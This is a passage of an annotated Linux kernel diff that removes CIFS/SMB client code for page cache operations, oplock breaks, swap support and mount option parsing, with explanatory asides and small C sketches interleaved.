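	if (len == PAGE_SIZE)			/* full-page overwrite */
		return true;
	/* page entirely beyond EOF, or write starts the page and covers
	 * every byte of existing data; the rest can be zero-filled */
	return page_start >= i_size || (offset == 0 && pos + len >= i_size);
}

int main(void)
{
	printf("%d\n", can_skip_read(8192, 100, 4096));	/* past EOF: 1 */
	printf("%d\n", can_skip_read(0, 4096, 10000));	/* full page: 1 */
	printf("%d\n", can_skip_read(100, 50, 10000));	/* interior:  0 */
	return 0;
}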
+-static bool cifs_release_folio(struct folio *folio, gfp_t gfp)
+-{
+-	if (folio_test_private(folio))
+-		return 0;
+-	if (folio_test_fscache(folio)) {
+-		if (current_is_kswapd() || !(gfp & __GFP_FS))
+-			return false;
+-		folio_wait_fscache(folio);
+-	}
+-	fscache_note_page_release(cifs_inode_cookie(folio->mapping->host));
+-	return true;
+-}
+-
+-static void cifs_invalidate_folio(struct folio *folio, size_t offset,
+-				 size_t length)
+-{
+-	folio_wait_fscache(folio);
+-}
+-
+-static int cifs_launder_folio(struct folio *folio)
+-{
+-	int rc = 0;
+-	loff_t range_start = folio_pos(folio);
+-	loff_t range_end = range_start + folio_size(folio);
+-	struct writeback_control wbc = {
+-		.sync_mode = WB_SYNC_ALL,
+-		.nr_to_write = 0,
+-		.range_start = range_start,
+-		.range_end = range_end,
+-	};
+-
+-	cifs_dbg(FYI, "Launder page: %lu\n", folio->index);
+-
+-	if (folio_clear_dirty_for_io(folio))
+-		rc = cifs_writepage_locked(&folio->page, &wbc);
+-
+-	folio_wait_fscache(folio);
+-	return rc;
+-}
+-
+-void cifs_oplock_break(struct work_struct *work)
+-{
+-	struct cifsFileInfo *cfile = container_of(work, struct cifsFileInfo,
+-						  oplock_break);
+-	struct inode *inode = d_inode(cfile->dentry);
+-	struct cifsInodeInfo *cinode = CIFS_I(inode);
+-	struct cifs_tcon *tcon = tlink_tcon(cfile->tlink);
+-	struct TCP_Server_Info *server = tcon->ses->server;
+-	int rc = 0;
+-	bool purge_cache = false, oplock_break_cancelled;
+-	__u64 persistent_fid, volatile_fid;
+-	__u16 net_fid;
+-
+-	wait_on_bit(&cinode->flags, CIFS_INODE_PENDING_WRITERS,
+-			TASK_UNINTERRUPTIBLE);
+-
+-	server->ops->downgrade_oplock(server, cinode, cfile->oplock_level,
+-				      cfile->oplock_epoch, &purge_cache);
+-
+-	if (!CIFS_CACHE_WRITE(cinode) && CIFS_CACHE_READ(cinode) &&
+-						cifs_has_mand_locks(cinode)) {
+-		cifs_dbg(FYI, "Reset oplock to None for inode=%p due to mand locks\n",
+-			 inode);
+-		cinode->oplock = 0;
+-	}
+-
+-	if (inode && S_ISREG(inode->i_mode)) {
+-		if (CIFS_CACHE_READ(cinode))
+-			break_lease(inode, O_RDONLY);
+-		else
+-			break_lease(inode, O_WRONLY);
+-		rc = filemap_fdatawrite(inode->i_mapping);
+-		if (!CIFS_CACHE_READ(cinode) || purge_cache) {
+-			rc = filemap_fdatawait(inode->i_mapping);
+-			mapping_set_error(inode->i_mapping, rc);
+-			cifs_zap_mapping(inode);
+-		}
+-		cifs_dbg(FYI, "Oplock flush inode %p rc %d\n", inode, rc);
+-		if (CIFS_CACHE_WRITE(cinode))
+-			goto oplock_break_ack;
+-	}
+-
+-	rc = cifs_push_locks(cfile);
+-	if (rc)
+-		cifs_dbg(VFS, "Push locks rc = %d\n", rc);
+-
+-oplock_break_ack:
+-	/*
+-	 * When an oplock break is received and there are no active
+-	 * file handles, only cached ones, schedule the deferred close
+-	 * immediately so that a new open will not use the cached handle.
+-	 */
+-
+-	if (!CIFS_CACHE_HANDLE(cinode) && !list_empty(&cinode->deferred_closes))
+-		cifs_close_deferred_file(cinode);
+-
+-	persistent_fid = cfile->fid.persistent_fid;
+-	volatile_fid = cfile->fid.volatile_fid;
+-	net_fid = cfile->fid.netfid;
+-	oplock_break_cancelled = cfile->oplock_break_cancelled;
+-
+-	_cifsFileInfo_put(cfile, false /* do not wait for ourselves */, false);
+-	/*
+-	 * Releasing a stale oplock after a recent reconnect of the SMB
+-	 * session, using a now incorrect file handle, is not a data
+-	 * integrity issue. Still, do not bother sending an oplock release
+-	 * if the session to the server is still disconnected, since the
+-	 * oplock has already been released by the server.
+-	 */
+-	if (!oplock_break_cancelled) {
+-		/* check for server null since can race with kill_sb calling tree disconnect */
+-		if (tcon->ses && tcon->ses->server) {
+-			rc = tcon->ses->server->ops->oplock_response(tcon, persistent_fid,
+-				volatile_fid, net_fid, cinode);
+-			cifs_dbg(FYI, "Oplock release rc = %d\n", rc);
+-		} else
+-			pr_warn_once("lease break not sent for unmounted share\n");
+-	}
+-
+-	cifs_done_oplock_break(cinode);
+-}
+-
+-/*
+- * The presence of cifs_direct_io() in the address space ops vector
+- * allows the open() O_DIRECT flag, which would have failed otherwise.
+- *
+- * In the non-cached mode (mount with cache=none), we shunt off direct read and write requests
+- * so this method should never be called.
+- *
+- * Direct IO is not yet supported in the cached mode.
+- */
+-static ssize_t
+-cifs_direct_io(struct kiocb *iocb, struct iov_iter *iter)
+-{
+-	/*
+-	 * FIXME
+-	 * Eventually need to support direct I/O for non-forcedirectio mounts
+-	 */
+-	return -EINVAL;
+-}
+-
+-static int cifs_swap_activate(struct swap_info_struct *sis,
+-			      struct file *swap_file, sector_t *span)
+-{
+-	struct cifsFileInfo *cfile = swap_file->private_data;
+-	struct inode *inode = swap_file->f_mapping->host;
+-	unsigned long blocks;
+-	long long isize;
+-
+-	cifs_dbg(FYI, "swap activate\n");
+-
+-	if (!swap_file->f_mapping->a_ops->swap_rw)
+-		/* Cannot support swap */
+-		return -EINVAL;
+-
+-	spin_lock(&inode->i_lock);
+-	blocks = inode->i_blocks;
+-	isize = inode->i_size;
+-	spin_unlock(&inode->i_lock);
+-	if (blocks*512 < isize) {
+-		pr_warn("swap activate: swapfile has holes\n");
+-		return -EINVAL;
+-	}
+-	*span = sis->pages;
+-
+-	pr_warn_once("Swap support over SMB3 is experimental\n");
+-
+-	/*
+-	 * TODO: consider adding ACL (or documenting how) to prevent other
+-	 * users (on this or other systems) from reading it
+-	 */
+-
+-	/* TODO: add sk_set_memalloc(inet) or similar */
+-
+-	if (cfile)
+-		cfile->swapfile = true;
+-	/*
+-	 * TODO: Since file already open, we can't open with DENY_ALL here
+-	 * but we could add call to grab a byte range lock to prevent others
+-	 * from reading or writing the file
+-	 */
+-
+-	sis->flags |= SWP_FS_OPS;
+-	return add_swap_extent(sis, 0, sis->max, 0);
+-}
+-
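/*
 * Aside: not from this patch.  The hole check in cifs_swap_activate()
 * above compares allocated blocks (i_blocks, in 512-byte units) against
 * i_size; any shortfall means the file is sparse and unusable as swap.
 * The sample figures below are invented.
 */
#include <stdio.h>

int main(void)
{
	unsigned long blocks = 1024;		/* i_blocks, 512-byte sectors */
	long long isize = 1024 * 512 + 1;	/* one byte more than allocated */

	if (blocks * 512LL < isize)
		printf("swapfile has holes, refusing\n");
	else
		printf("fully allocated, ok\n");
	return 0;
}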
+-static void cifs_swap_deactivate(struct file *file)
+-{
+-	struct cifsFileInfo *cfile = file->private_data;
+-
+-	cifs_dbg(FYI, "swap deactivate\n");
+-
+-	/* TODO: undo sk_set_memalloc(inet) will eventually be needed */
+-
+-	if (cfile)
+-		cfile->swapfile = false;
+-
+-	/* do we need to unpin (or unlock) the file */
+-}
+-
+-/*
+- * Mark a page as having been made dirty and thus needing writeback.  We also
+- * need to pin the cache object to write back to.
+- */
+-#ifdef CONFIG_CIFS_FSCACHE
+-static bool cifs_dirty_folio(struct address_space *mapping, struct folio *folio)
+-{
+-	return fscache_dirty_folio(mapping, folio,
+-					cifs_inode_cookie(mapping->host));
+-}
+-#else
+-#define cifs_dirty_folio filemap_dirty_folio
+-#endif
+-
+-const struct address_space_operations cifs_addr_ops = {
+-	.read_folio = cifs_read_folio,
+-	.readahead = cifs_readahead,
+-	.writepage = cifs_writepage,
+-	.writepages = cifs_writepages,
+-	.write_begin = cifs_write_begin,
+-	.write_end = cifs_write_end,
+-	.dirty_folio = cifs_dirty_folio,
+-	.release_folio = cifs_release_folio,
+-	.direct_IO = cifs_direct_io,
+-	.invalidate_folio = cifs_invalidate_folio,
+-	.launder_folio = cifs_launder_folio,
+-	/*
+-	 * TODO: investigate and, if useful, add a cifs_migratePage
+-	 * helper (under CONFIG_MIGRATION) in the future, and also
+-	 * investigate and add an is_dirty_writeback helper if needed
+-	 */
+-	.swap_activate = cifs_swap_activate,
+-	.swap_deactivate = cifs_swap_deactivate,
+-};
+-
+-/*
+- * cifs_readahead requires the server to support a buffer large enough to
+- * contain the header plus one complete page of data.  Otherwise, we need
+- * to leave cifs_readahead out of the address space operations.
+- */
+-const struct address_space_operations cifs_addr_ops_smallbuf = {
+-	.read_folio = cifs_read_folio,
+-	.writepage = cifs_writepage,
+-	.writepages = cifs_writepages,
+-	.write_begin = cifs_write_begin,
+-	.write_end = cifs_write_end,
+-	.dirty_folio = cifs_dirty_folio,
+-	.release_folio = cifs_release_folio,
+-	.invalidate_folio = cifs_invalidate_folio,
+-	.launder_folio = cifs_launder_folio,
+-};
+diff --git a/fs/cifs/fs_context.c b/fs/cifs/fs_context.c
+deleted file mode 100644
+index e2e2ef0fa9a0f..0000000000000
+--- a/fs/cifs/fs_context.c
++++ /dev/null
+@@ -1,1773 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- *   Copyright (C) 2020, Microsoft Corporation.
+- *
+- *   Author(s): Steve French <stfrench@microsoft.com>
+- *              David Howells <dhowells@redhat.com>
+- */
+-
+-/*
+-#include <linux/module.h>
+-#include <linux/nsproxy.h>
+-#include <linux/slab.h>
+-#include <linux/magic.h>
+-#include <linux/security.h>
+-#include <net/net_namespace.h>
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-#include "dfs_cache.h"
+-#endif
+-*/
+-
+-#include <linux/ctype.h>
+-#include <linux/fs_context.h>
+-#include <linux/fs_parser.h>
+-#include <linux/fs.h>
+-#include <linux/mount.h>
+-#include <linux/parser.h>
+-#include <linux/utsname.h>
+-#include "cifsfs.h"
+-#include "cifspdu.h"
+-#include "cifsglob.h"
+-#include "cifsproto.h"
+-#include "cifs_unicode.h"
+-#include "cifs_debug.h"
+-#include "cifs_fs_sb.h"
+-#include "ntlmssp.h"
+-#include "nterr.h"
+-#include "rfc1002pdu.h"
+-#include "fs_context.h"
+-
+-static DEFINE_MUTEX(cifs_mount_mutex);
+-
+-static const match_table_t cifs_smb_version_tokens = {
+-	{ Smb_1, SMB1_VERSION_STRING },
+-	{ Smb_20, SMB20_VERSION_STRING},
+-	{ Smb_21, SMB21_VERSION_STRING },
+-	{ Smb_30, SMB30_VERSION_STRING },
+-	{ Smb_302, SMB302_VERSION_STRING },
+-	{ Smb_302, ALT_SMB302_VERSION_STRING },
+-	{ Smb_311, SMB311_VERSION_STRING },
+-	{ Smb_311, ALT_SMB311_VERSION_STRING },
+-	{ Smb_3any, SMB3ANY_VERSION_STRING },
+-	{ Smb_default, SMBDEFAULT_VERSION_STRING },
+-	{ Smb_version_err, NULL }
+-};
+-
+-static const match_table_t cifs_secflavor_tokens = {
+-	{ Opt_sec_krb5, "krb5" },
+-	{ Opt_sec_krb5i, "krb5i" },
+-	{ Opt_sec_krb5p, "krb5p" },
+-	{ Opt_sec_ntlmsspi, "ntlmsspi" },
+-	{ Opt_sec_ntlmssp, "ntlmssp" },
+-	{ Opt_sec_ntlmv2, "nontlm" },
+-	{ Opt_sec_ntlmv2, "ntlmv2" },
+-	{ Opt_sec_ntlmv2i, "ntlmv2i" },
+-	{ Opt_sec_none, "none" },
+-
+-	{ Opt_sec_err, NULL }
+-};
+-
+-const struct fs_parameter_spec smb3_fs_parameters[] = {
+-	/* Mount options that take no arguments */
+-	fsparam_flag_no("user_xattr", Opt_user_xattr),
+-	fsparam_flag_no("forceuid", Opt_forceuid),
+-	fsparam_flag_no("multichannel", Opt_multichannel),
+-	fsparam_flag_no("forcegid", Opt_forcegid),
+-	fsparam_flag("noblocksend", Opt_noblocksend),
+-	fsparam_flag("noautotune", Opt_noautotune),
+-	fsparam_flag("nolease", Opt_nolease),
+-	fsparam_flag_no("hard", Opt_hard),
+-	fsparam_flag_no("soft", Opt_soft),
+-	fsparam_flag_no("perm", Opt_perm),
+-	fsparam_flag("nodelete", Opt_nodelete),
+-	fsparam_flag_no("mapposix", Opt_mapposix),
+-	fsparam_flag("mapchars", Opt_mapchars),
+-	fsparam_flag("nomapchars", Opt_nomapchars),
+-	fsparam_flag_no("sfu", Opt_sfu),
+-	fsparam_flag("nodfs", Opt_nodfs),
+-	fsparam_flag_no("posixpaths", Opt_posixpaths),
+-	fsparam_flag_no("unix", Opt_unix),
+-	fsparam_flag_no("linux", Opt_unix),
+-	fsparam_flag_no("posix", Opt_unix),
+-	fsparam_flag("nocase", Opt_nocase),
+-	fsparam_flag("ignorecase", Opt_nocase),
+-	fsparam_flag_no("brl", Opt_brl),
+-	fsparam_flag_no("handlecache", Opt_handlecache),
+-	fsparam_flag("forcemandatorylock", Opt_forcemandatorylock),
+-	fsparam_flag("forcemand", Opt_forcemandatorylock),
+-	fsparam_flag("setuidfromacl", Opt_setuidfromacl),
+-	fsparam_flag("idsfromsid", Opt_setuidfromacl),
+-	fsparam_flag_no("setuids", Opt_setuids),
+-	fsparam_flag_no("dynperm", Opt_dynperm),
+-	fsparam_flag_no("intr", Opt_intr),
+-	fsparam_flag_no("strictsync", Opt_strictsync),
+-	fsparam_flag_no("serverino", Opt_serverino),
+-	fsparam_flag("rwpidforward", Opt_rwpidforward),
+-	fsparam_flag("cifsacl", Opt_cifsacl),
+-	fsparam_flag_no("acl", Opt_acl),
+-	fsparam_flag("locallease", Opt_locallease),
+-	fsparam_flag("sign", Opt_sign),
+-	fsparam_flag("ignore_signature", Opt_ignore_signature),
+-	fsparam_flag("signloosely", Opt_ignore_signature),
+-	fsparam_flag("seal", Opt_seal),
+-	fsparam_flag("noac", Opt_noac),
+-	fsparam_flag("fsc", Opt_fsc),
+-	fsparam_flag("mfsymlinks", Opt_mfsymlinks),
+-	fsparam_flag("multiuser", Opt_multiuser),
+-	fsparam_flag("sloppy", Opt_sloppy),
+-	fsparam_flag("nosharesock", Opt_nosharesock),
+-	fsparam_flag_no("persistenthandles", Opt_persistent),
+-	fsparam_flag_no("resilienthandles", Opt_resilient),
+-	fsparam_flag_no("tcpnodelay", Opt_tcp_nodelay),
+-	fsparam_flag("nosparse", Opt_nosparse),
+-	fsparam_flag("domainauto", Opt_domainauto),
+-	fsparam_flag("rdma", Opt_rdma),
+-	fsparam_flag("modesid", Opt_modesid),
+-	fsparam_flag("modefromsid", Opt_modesid),
+-	fsparam_flag("rootfs", Opt_rootfs),
+-	fsparam_flag("compress", Opt_compress),
+-	fsparam_flag("witness", Opt_witness),
+-
+-	/* Mount options which take numeric value */
+-	fsparam_u32("backupuid", Opt_backupuid),
+-	fsparam_u32("backupgid", Opt_backupgid),
+-	fsparam_u32("uid", Opt_uid),
+-	fsparam_u32("cruid", Opt_cruid),
+-	fsparam_u32("gid", Opt_gid),
+-	fsparam_u32("file_mode", Opt_file_mode),
+-	fsparam_u32("dirmode", Opt_dirmode),
+-	fsparam_u32("dir_mode", Opt_dirmode),
+-	fsparam_u32("port", Opt_port),
+-	fsparam_u32("min_enc_offload", Opt_min_enc_offload),
+-	fsparam_u32("esize", Opt_min_enc_offload),
+-	fsparam_u32("bsize", Opt_blocksize),
+-	fsparam_u32("rasize", Opt_rasize),
+-	fsparam_u32("rsize", Opt_rsize),
+-	fsparam_u32("wsize", Opt_wsize),
+-	fsparam_u32("actimeo", Opt_actimeo),
+-	fsparam_u32("acdirmax", Opt_acdirmax),
+-	fsparam_u32("acregmax", Opt_acregmax),
+-	fsparam_u32("closetimeo", Opt_closetimeo),
+-	fsparam_u32("echo_interval", Opt_echo_interval),
+-	fsparam_u32("max_credits", Opt_max_credits),
+-	fsparam_u32("handletimeout", Opt_handletimeout),
+-	fsparam_u64("snapshot", Opt_snapshot),
+-	fsparam_u32("max_channels", Opt_max_channels),
+-
+-	/* Mount options which take string value */
+-	fsparam_string("source", Opt_source),
+-	fsparam_string("user", Opt_user),
+-	fsparam_string("username", Opt_user),
+-	fsparam_string("pass", Opt_pass),
+-	fsparam_string("password", Opt_pass),
+-	fsparam_string("ip", Opt_ip),
+-	fsparam_string("addr", Opt_ip),
+-	fsparam_string("domain", Opt_domain),
+-	fsparam_string("dom", Opt_domain),
+-	fsparam_string("srcaddr", Opt_srcaddr),
+-	fsparam_string("iocharset", Opt_iocharset),
+-	fsparam_string("netbiosname", Opt_netbiosname),
+-	fsparam_string("servern", Opt_servern),
+-	fsparam_string("ver", Opt_ver),
+-	fsparam_string("vers", Opt_vers),
+-	fsparam_string("sec", Opt_sec),
+-	fsparam_string("cache", Opt_cache),
+-
+-	/* Arguments that should be ignored */
+-	fsparam_flag("guest", Opt_ignore),
+-	fsparam_flag("noatime", Opt_ignore),
+-	fsparam_flag("relatime", Opt_ignore),
+-	fsparam_flag("_netdev", Opt_ignore),
+-	fsparam_flag_no("suid", Opt_ignore),
+-	fsparam_flag_no("exec", Opt_ignore),
+-	fsparam_flag_no("dev", Opt_ignore),
+-	fsparam_flag_no("mand", Opt_ignore),
+-	fsparam_flag_no("auto", Opt_ignore),
+-	fsparam_string("cred", Opt_ignore),
+-	fsparam_string("credentials", Opt_ignore),
+-	/*
+-	 * UNC and prefixpath is now extracted from Opt_source
+-	 * in the new mount API so we can just ignore them going forward.
+-	 */
+-	fsparam_string("unc", Opt_ignore),
+-	fsparam_string("prefixpath", Opt_ignore),
+-	{}
+-};
+-
+-static int
+-cifs_parse_security_flavors(struct fs_context *fc, char *value, struct smb3_fs_context *ctx)
+-{
+-	substring_t args[MAX_OPT_ARGS];
+-
+-	/*
+-	 * With mount options, the last one should win. Reset any existing
+-	 * settings back to default.
+-	 */
+-	ctx->sectype = Unspecified;
+-	ctx->sign = false;
+-
+-	switch (match_token(value, cifs_secflavor_tokens, args)) {
+-	case Opt_sec_krb5p:
+-		cifs_errorf(fc, "sec=krb5p is not supported!\n");
+-		return 1;
+-	case Opt_sec_krb5i:
+-		ctx->sign = true;
+-		fallthrough;
+-	case Opt_sec_krb5:
+-		ctx->sectype = Kerberos;
+-		break;
+-	case Opt_sec_ntlmsspi:
+-		ctx->sign = true;
+-		fallthrough;
+-	case Opt_sec_ntlmssp:
+-		ctx->sectype = RawNTLMSSP;
+-		break;
+-	case Opt_sec_ntlmv2i:
+-		ctx->sign = true;
+-		fallthrough;
+-	case Opt_sec_ntlmv2:
+-		ctx->sectype = NTLMv2;
+-		break;
+-	case Opt_sec_none:
+-		ctx->nullauth = 1;
+-		break;
+-	default:
+-		cifs_errorf(fc, "bad security option: %s\n", value);
+-		return 1;
+-	}
+-
+-	return 0;
+-}
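
The fallthrough pairs above encode a single rule: a trailing "i" on the
flavor name (krb5i, ntlmsspi, ntlmv2i) selects the same authentication
mechanism plus mandatory signing, while sec=krb5p is rejected outright.
Summarized from the switch:

	sec=		ctx->sectype	ctx->sign
	krb5		Kerberos	false
	krb5i		Kerberos	true
	ntlmssp		RawNTLMSSP	false
	ntlmsspi	RawNTLMSSP	true
	ntlmv2		NTLMv2		false
	ntlmv2i		NTLMv2		true
	none		(nullauth = 1)	false
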
+-
+-static const match_table_t cifs_cacheflavor_tokens = {
+-	{ Opt_cache_loose, "loose" },
+-	{ Opt_cache_strict, "strict" },
+-	{ Opt_cache_none, "none" },
+-	{ Opt_cache_ro, "ro" },
+-	{ Opt_cache_rw, "singleclient" },
+-	{ Opt_cache_err, NULL }
+-};
+-
+-static int
+-cifs_parse_cache_flavor(struct fs_context *fc, char *value, struct smb3_fs_context *ctx)
+-{
+-	substring_t args[MAX_OPT_ARGS];
+-
+-	switch (match_token(value, cifs_cacheflavor_tokens, args)) {
+-	case Opt_cache_loose:
+-		ctx->direct_io = false;
+-		ctx->strict_io = false;
+-		ctx->cache_ro = false;
+-		ctx->cache_rw = false;
+-		break;
+-	case Opt_cache_strict:
+-		ctx->direct_io = false;
+-		ctx->strict_io = true;
+-		ctx->cache_ro = false;
+-		ctx->cache_rw = false;
+-		break;
+-	case Opt_cache_none:
+-		ctx->direct_io = true;
+-		ctx->strict_io = false;
+-		ctx->cache_ro = false;
+-		ctx->cache_rw = false;
+-		break;
+-	case Opt_cache_ro:
+-		ctx->direct_io = false;
+-		ctx->strict_io = false;
+-		ctx->cache_ro = true;
+-		ctx->cache_rw = false;
+-		break;
+-	case Opt_cache_rw:
+-		ctx->direct_io = false;
+-		ctx->strict_io = false;
+-		ctx->cache_ro = false;
+-		ctx->cache_rw = true;
+-		break;
+-	default:
+-		cifs_errorf(fc, "bad cache= option: %s\n", value);
+-		return 1;
+-	}
+-	return 0;
+-}
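
Each cache= flavor is mutually exclusive: every branch clears all four
mode flags and sets at most one ("loose" leaves them all clear). The
switch above is therefore equivalent to the following reset-then-set
sketch (an illustrative refactor, not the kernel's code):

static void set_cache_flavor(struct smb3_fs_context *ctx, int flavor)
{
	/* start from the cache=loose state: everything off */
	ctx->direct_io = false;
	ctx->strict_io = false;
	ctx->cache_ro = false;
	ctx->cache_rw = false;

	switch (flavor) {
	case Opt_cache_strict:
		ctx->strict_io = true;	/* strict cache coherency */
		break;
	case Opt_cache_none:
		ctx->direct_io = true;	/* bypass the page cache */
		break;
	case Opt_cache_ro:
		ctx->cache_ro = true;	/* treat the share as read-only */
		break;
	case Opt_cache_rw:
		ctx->cache_rw = true;	/* "singleclient": sole accessor */
		break;
	}
}
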
+-
+-#define DUP_CTX_STR(field)						\
+-do {									\
+-	if (ctx->field) {						\
+-		new_ctx->field = kstrdup(ctx->field, GFP_ATOMIC);	\
+-		if (new_ctx->field == NULL) {				\
+-			smb3_cleanup_fs_context_contents(new_ctx);	\
+-			return -ENOMEM;					\
+-		}							\
+-	}								\
+-} while (0)
+-
+-int
+-smb3_fs_context_dup(struct smb3_fs_context *new_ctx, struct smb3_fs_context *ctx)
+-{
+-	memcpy(new_ctx, ctx, sizeof(*ctx));
+-	new_ctx->prepath = NULL;
+-	new_ctx->mount_options = NULL;
+-	new_ctx->nodename = NULL;
+-	new_ctx->username = NULL;
+-	new_ctx->password = NULL;
+-	new_ctx->server_hostname = NULL;
+-	new_ctx->domainname = NULL;
+-	new_ctx->UNC = NULL;
+-	new_ctx->source = NULL;
+-	new_ctx->iocharset = NULL;
+-	/*
+-	 * Make sure to stay in sync with smb3_cleanup_fs_context_contents()
+-	 */
+-	DUP_CTX_STR(prepath);
+-	DUP_CTX_STR(mount_options);
+-	DUP_CTX_STR(username);
+-	DUP_CTX_STR(password);
+-	DUP_CTX_STR(server_hostname);
+-	DUP_CTX_STR(UNC);
+-	DUP_CTX_STR(source);
+-	DUP_CTX_STR(domainname);
+-	DUP_CTX_STR(nodename);
+-	DUP_CTX_STR(iocharset);
+-
+-	return 0;
+-}
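
The shape of smb3_fs_context_dup() is a common deep-copy idiom: memcpy
the whole struct, immediately NULL out every owned pointer so that an
allocation failure can never leave the copy sharing (and later
double-freeing) the original's strings, then duplicate each string in
turn, unwinding through the cleanup helper on ENOMEM. A minimal
userspace analogue of the same pattern (the struct and field names are
made up for illustration):

#include <stdlib.h>
#include <string.h>

struct conf {
	int flags;
	char *name;
	char *path;
};

/* Deep-copy @src into @dst; on failure nothing is left half-owned. */
static int conf_dup(struct conf *dst, const struct conf *src)
{
	*dst = *src;		/* shallow copy of the scalars */
	dst->name = NULL;	/* detach pointers before duplicating */
	dst->path = NULL;

	if (src->name && !(dst->name = strdup(src->name)))
		goto err;
	if (src->path && !(dst->path = strdup(src->path)))
		goto err;
	return 0;
err:
	free(dst->name);	/* free(NULL) is a no-op */
	free(dst->path);
	dst->name = dst->path = NULL;
	return -1;
}
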
+-
+-static int
+-cifs_parse_smb_version(struct fs_context *fc, char *value, struct smb3_fs_context *ctx, bool is_smb3)
+-{
+-	substring_t args[MAX_OPT_ARGS];
+-
+-	switch (match_token(value, cifs_smb_version_tokens, args)) {
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-	case Smb_1:
+-		if (disable_legacy_dialects) {
+-			cifs_errorf(fc, "mount with legacy dialect disabled\n");
+-			return 1;
+-		}
+-		if (is_smb3) {
+-			cifs_errorf(fc, "vers=1.0 (cifs) not permitted when mounting with smb3\n");
+-			return 1;
+-		}
+-		cifs_errorf(fc, "Use of the less secure dialect vers=1.0 is not recommended unless required for access to very old servers\n");
+-		ctx->ops = &smb1_operations;
+-		ctx->vals = &smb1_values;
+-		break;
+-	case Smb_20:
+-		if (disable_legacy_dialects) {
+-			cifs_errorf(fc, "mount with legacy dialect disabled\n");
+-			return 1;
+-		}
+-		if (is_smb3) {
+-			cifs_errorf(fc, "vers=2.0 not permitted when mounting with smb3\n");
+-			return 1;
+-		}
+-		ctx->ops = &smb20_operations;
+-		ctx->vals = &smb20_values;
+-		break;
+-#else
+-	case Smb_1:
+-		cifs_errorf(fc, "vers=1.0 (cifs) mount not permitted when legacy dialects disabled\n");
+-		return 1;
+-	case Smb_20:
+-		cifs_errorf(fc, "vers=2.0 mount not permitted when legacy dialects disabled\n");
+-		return 1;
+-#endif /* CIFS_ALLOW_INSECURE_LEGACY */
+-	case Smb_21:
+-		ctx->ops = &smb21_operations;
+-		ctx->vals = &smb21_values;
+-		break;
+-	case Smb_30:
+-		ctx->ops = &smb30_operations;
+-		ctx->vals = &smb30_values;
+-		break;
+-	case Smb_302:
+-		ctx->ops = &smb30_operations; /* currently identical with 3.0 */
+-		ctx->vals = &smb302_values;
+-		break;
+-	case Smb_311:
+-		ctx->ops = &smb311_operations;
+-		ctx->vals = &smb311_values;
+-		break;
+-	case Smb_3any:
+-		ctx->ops = &smb30_operations; /* currently identical with 3.0 */
+-		ctx->vals = &smb3any_values;
+-		break;
+-	case Smb_default:
+-		ctx->ops = &smb30_operations;
+-		ctx->vals = &smbdefault_values;
+-		break;
+-	default:
+-		cifs_errorf(fc, "Unknown vers= option specified: %s\n", value);
+-		return 1;
+-	}
+-	return 0;
+-}
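
Note that the dialect switch only ever varies two pointers: the
operations table and the values table. Smb_302 and Smb_3any reuse the
3.0 operations with their own values tables, and the default offers
SMB2.1 or later. Summarized from the cases above:

	token		ctx->ops		ctx->vals
	Smb_1		smb1_operations		smb1_values       (legacy only)
	Smb_20		smb20_operations	smb20_values      (legacy only)
	Smb_21		smb21_operations	smb21_values
	Smb_30		smb30_operations	smb30_values
	Smb_302		smb30_operations	smb302_values
	Smb_311		smb311_operations	smb311_values
	Smb_3any	smb30_operations	smb3any_values
	Smb_default	smb30_operations	smbdefault_values
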
+-
+-int smb3_parse_opt(const char *options, const char *key, char **val)
+-{
+-	int rc = -ENOENT;
+-	char *opts, *orig, *p;
+-
+-	orig = opts = kstrdup(options, GFP_KERNEL);
+-	if (!opts)
+-		return -ENOMEM;
+-
+-	while ((p = strsep(&opts, ","))) {
+-		char *nval;
+-
+-		if (!*p)
+-			continue;
+-		if (strncasecmp(p, key, strlen(key)))
+-			continue;
+-		nval = strchr(p, '=');
+-		if (nval) {
+-			if (nval == p)
+-				continue;
+-			*nval++ = 0;
+-			*val = kstrdup(nval, GFP_KERNEL);
+-			rc = !*val ? -ENOMEM : 0;
+-			goto out;
+-		}
+-	}
+-out:
+-	kfree(orig);
+-	return rc;
+-}
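
smb3_parse_opt() is a self-contained scanner: duplicate the option
string, walk it with strsep(), and copy out the value of the first key
that matches case-insensitively. A runnable userspace sketch of the
same loop (the option string and key below are made-up examples):

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>

/* Return a malloc'd copy of the value for @key in @options, or NULL. */
static char *parse_opt(const char *options, const char *key)
{
	char *opts, *orig, *p, *val = NULL;

	orig = opts = strdup(options);
	if (!opts)
		return NULL;

	while ((p = strsep(&opts, ","))) {
		char *nval;

		if (!*p)
			continue;
		if (strncasecmp(p, key, strlen(key)))
			continue;
		nval = strchr(p, '=');
		if (nval && nval != p) {
			*nval++ = 0;
			val = strdup(nval);
			break;
		}
	}
	free(orig);
	return val;
}

int main(void)
{
	char *v = parse_opt("vers=3.1.1,seal,username=alice", "username");

	printf("username=%s\n", v ? v : "(none)");	/* prints alice */
	free(v);
	return 0;
}

Note that the comparison is a prefix match (it uses strlen(key)), so a
key of "user" would also match "username="; callers are expected to
pass keys that are unambiguous in the option string.
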
+-
+-/*
+- * Remove duplicate path delimiters. Windows is supposed to do that
+- * but there are some bugs that prevent rename from working if there are
+- * multiple delimiters.
+- *
+- * Returns a sanitized duplicate of @prepath. @gfp indicates the GFP_* flags
+- * for kstrdup.
+- * The caller is responsible for freeing the original.
+- */
+-#define IS_DELIM(c) ((c) == '/' || (c) == '\\')
+-char *cifs_sanitize_prepath(char *prepath, gfp_t gfp)
+-{
+-	char *cursor1 = prepath, *cursor2 = prepath;
+-
+-	/* skip all prepended delimiters */
+-	while (IS_DELIM(*cursor1))
+-		cursor1++;
+-
+-	/* copy the first letter */
+-	*cursor2 = *cursor1;
+-
+-	/* copy the remainder... */
+-	while (*(cursor1++)) {
+-		/* ... skipping all duplicated delimiters */
+-		if (IS_DELIM(*cursor1) && IS_DELIM(*cursor2))
+-			continue;
+-		*(++cursor2) = *cursor1;
+-	}
+-
+-	/* if the last character is a delimiter, skip it */
+-	if (IS_DELIM(*(cursor2 - 1)))
+-		cursor2--;
+-
+-	*(cursor2) = '\0';
+-	return kstrdup(prepath, gfp);
+-}
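
Worked example: the two cursors above compact the string in place, so
"//dir1///dir2\\dir3//" becomes "dir1/dir2\dir3" before being
duplicated. A standalone sketch of the same walk (strdup in place of
kstrdup; a guard against all-delimiter input is added here, which the
kernel's callers avoid by construction):

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

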